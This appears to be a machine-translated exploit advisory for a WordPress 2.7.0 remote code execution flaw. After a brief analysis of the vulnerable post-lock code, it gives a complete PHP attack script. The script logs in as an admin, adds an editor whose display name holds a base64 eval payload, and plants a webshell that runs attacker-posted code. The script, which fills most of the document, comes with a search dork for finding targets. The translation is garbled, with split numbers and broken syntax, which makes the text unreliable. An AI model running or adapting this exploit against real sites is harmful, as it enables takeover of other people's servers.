Wordpress 2.7.0 admin remote code execution vulnerability-vulnerability warning-the black bar safety net

2008-12-25T00:00:00
ID MYHACK58:62200821620
Type myhack58
Reporter 佚名
Modified 2008-12-25T00:00:00

Description

by Ryat[puretot] mail: puretot at gmail dot com team: http://www.80vul.com date: 2008-12-18

Analysis:

This vulnerability out in the background:

`(

wp-admin/post.php

if ( current_user_can('edit_post', $post_ID) ) { if ( $last = wp_check_post_lock( $post->ID ) ) { $last_user = get_userdata( $last ); $last_user_name = $last_user ? $last_user->display_name : ('Somebody'); $message = sprintf( ( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) ); $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" ); //Submit\'through here the code after processing becomes\' :) `

add_action('admin_notices', create_function( ", "echo '$message';" ) ); //Using the above method of closing the echo back of the single quotes,you can execute the command. [ex:\';phpinfo();\'];in addition this place can also use create_function function its a bug[1]to perform command[ex:\';}phpinfo();//] } else { wp_set_post_lock( $post->ID ); wp_enqueue_script('autosave'); } } 2. EXP:

`#!/ usr/bin/php <? php

print_r(' +---------------------------------------------------------------------------+ Wordpress 2.7.0 remote code execution exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org site: http://www.80vul.com dork: "powered by WordPress" +---------------------------------------------------------------------------+ '); /* * works regardless of php. ini settings / if ($argc < 6) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path user pass post host: target server (ip/hostname) path: path to wordpress user: admin login username pass: admin login password post: the available post id Example: php '.$ argv[0].' localhost /wp/ admin 1 2 3 4 5 6 1 +---------------------------------------------------------------------------+ '); exit; }

error_reporting(7); ini_set('max_execution_time', 0);

$host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $post = $argv[5];

$shellcode = '\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnqvcgx1z2lucy93b2x2zxoucghwjywndysnkswnpd9ldmfskcrfue9tvftjxsk7pz5wdxjldf90jyk7));\\"; //$shellcode = '\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnqvcgx1z2lucy93b2x2zxoucghwjywndysnkswnpd9ldmfskcrfue9tvftjxsk7pz5wdxjldf90jyk7));//'; $shell = 'http://'.$ host.$ path.'wp-content/plugins/wolvez.php'; /* * wolvez.php has this code: * <? eval($_POST[c])?> / $url = $path.'wp-login.php'; $cmd = 'log='. urlencode($user).'& pwd='. urlencode($pass); $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);

if (!$ admin_cookie) exit("Exploit Failed!\ n");

$url = $path.'wp-admin/user-new. php#add-new-user'; $cmd = "; $resp = send($admin_cookie[1]); preg_match('/name="_wpnonce"\svalue="([a-z0-9]{1 0})"/', $resp, $_wpnonce);

if (!$ _wpnonce) exit("Exploit Failed!\ n");

$cmd = '_wpnonce='.$ _wpnonce[1].'& action=adduser&user_login=ryat&email=ryat%40ryat. com&pass1=1 2 3 4 5 6&pass2=1 2 3 4 5 6&role=editor&display_name='.$ shellcode; $resp = send($admin_cookie[1]);

if (strpos($resp, 'users. php? usersearch=ryat&update=add#user') === false) exit("Exploit Failed!\ n");

$url = $path.'wp-login.php'; $cmd = 'log=ryat&pwd=1 2 3 4 5 6'; $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);

if (!$ editor_cookie) exit("Exploit Failed!\ n");

$url = $path.'wp-admin/post. php? action=edit&post='.$ post; $cmd = "; send($editor_cookie[1]); send($admin_cookie[1]);

if (strpos(file_get_contents($shell), 'puret_t') !== false) exit("Expoilt Success!\ nView Your shell:\t$shell\n"); else exit("Exploit Failed!\ n");

function send($cookie = ") { global $host, $path, $url, $cmd;

$data = "POST $url HTTP/1.1\r\n"; $data .= "Accept: /\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n"; $data .= "Connection: Close\r\n"; $data .= "Cookie: $cookie\r\n\r\n"; $data .= $cmd;

$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?> `